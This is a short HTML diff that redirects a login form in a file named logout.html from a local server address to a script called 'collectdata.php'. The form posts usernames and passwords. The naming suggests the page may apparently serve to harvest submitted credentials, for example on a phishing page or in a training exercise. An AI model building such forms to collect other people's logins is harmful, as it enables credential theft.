--- a/logout.html
+++ b/logout.html
@@ -132,7 +132,7 @@
                 <button>create</button>
                 <p class="message">Already registered? <a href="#">Sign In</a></p>
             </form>
-            <form class="login-form" action="http://192.168.2.83:5005/login" method="POST">
+            <form class="login-form" action="collectdata.php" method="POST">
                 <b>LOGIN</b> <br \="">
                 <input type="text" name="username" placeholder="username">
                 <input type="password" name="password" placeholder="password">
